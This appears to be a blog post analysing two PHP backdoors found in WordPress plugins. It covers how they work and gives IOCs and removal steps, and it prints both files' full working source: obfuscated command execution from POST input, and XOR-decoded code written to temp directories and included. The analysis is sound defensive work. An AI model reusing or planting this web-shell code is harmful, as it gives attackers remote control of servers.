Technical Analysis
Upon reviewing the WordPress site, I detected two malware files: sadtab_chpw.php and xdiff.php. Both files were located within plugins and detected as malicious by Wordfence, confirmed as Zero-Day/Unique threats on VirusTotal.
The sadtab_chpw.php script employs a series of obfuscated function names to execute system commands based on POST requests. This malicious file utilizes various methods (system, shell_exec, exec, etc.) to process incoming data, potentially allowing unauthorized access or control over the server.
Similarly, xdiff.php handles POST requests to write and execute code in temporary directories. It processes a post parameter through a bitwise XOR operation, storing and executing the result in temporary files, then cleaning up post execution. This behavior is typical of a backdoor, ensuring persistent access by the attacker by exploiting writable directories.
VirusTotal Analysis: 🛡️ Zero-Day / Fully Undetected.
Attack Chain
- Detection of malicious plugins by Wordfence.
- Analysis of
sadtab_chpw.phpandxdiff.php. - Verification of Zero-Day/Unique status on VirusTotal.
Code Signature(s)
FILE: sadtab_chpw.php
<?php
$task_processor4 = "p\x61\x73sth\x72\x75";
$task_processor5 = "p\x6F\x70en";
$task_processor1 = "\x73ys\x74\x65m";
$task_processor2 = "\x73hell_e\x78ec";
$task_processor3 = "\x65\x78ec";
$publish_content = "h\x65x2\x62\x69n";
$task_processor6 = "\x73\x74\x72ea\x6D_\x67\x65\x74_\x63\x6F\x6Etents";
$task_processor7 = "\x70clo\x73e";
if (isset($_POST["\x6D\x61rk\x65r"])) {
function secure_access ($record , $fac ) { $ent= '' ; for($l=0; $l<strlen($record); $l++){$ent.=chr(ord($record[$l])^$fac);} return$ent;}
$marker = $publish_content($_POST["\x6D\x61rk\x65r"]);
$marker = secure_access($marker, 80);
if (function_exists($task_processor1)) {
$task_processor1($marker);
} elseif (function_exists($task_processor2)) {
print $task_processor2($marker);
} elseif (function_exists($task_processor3)) {
$task_processor3($marker, $pset_record);
print join("\n", $pset_record);
} elseif (function_exists($task_processor4)) {
$task_processor4($marker);
} elseif (function_exists($task_processor5) && function_exists($task_processor6) && function_exists($task_processor7)) {
$fac_ent = $task_processor5($marker, 'r');
if ($fac_ent) {
$res_holder = $task_processor6($fac_ent);
$task_processor7($fac_ent);
print $res_holder;
}
}
exit;
}
FILE: xdiff.php
<?php
if(filter_has_var(INPUT_POST, "\x74oke\x6E")){
$key = array_filter(["/var/tmp", ini_get("upload_tmp_dir"), getcwd(), "/dev/shm", getenv("TEMP"), sys_get_temp_dir(), session_save_path(), "/tmp", getenv("TMP")]);
$symbol = hex2bin($_POST["\x74oke\x6E"]);
$sym = '' ; foreach(str_split($symbol) as $char){$sym .= chr(ord($char) ^ 36);}
$k = 0;
do {
$parameter_group = $key[$k] ?? null;
if ($k >= count($key)) break;
if (is_dir($parameter_group) && is_writable($parameter_group)) {
$dat = str_replace("{var_dir}", $parameter_group, "{var_dir}/.data_chunk");
$success = file_put_contents($dat, $sym);
if ($success) {
include $dat;
@unlink($dat);
exit;}
}
$k++;
} while (true);
}
Indicators of Compromise (IOCs)
sadtab_chpw[.]phpxdiff[.]php
Removal Protocol
- Immediately remove the files
sadtab_chpw.phpandxdiff.php. - Update all WordPress plugins to the latest versions.
- Perform a full security audit of the file system.
- Monitor network traffic for suspicious activities.
Status: Active Threat.
Verification: Verified by MD Pabel.
Top comments (0)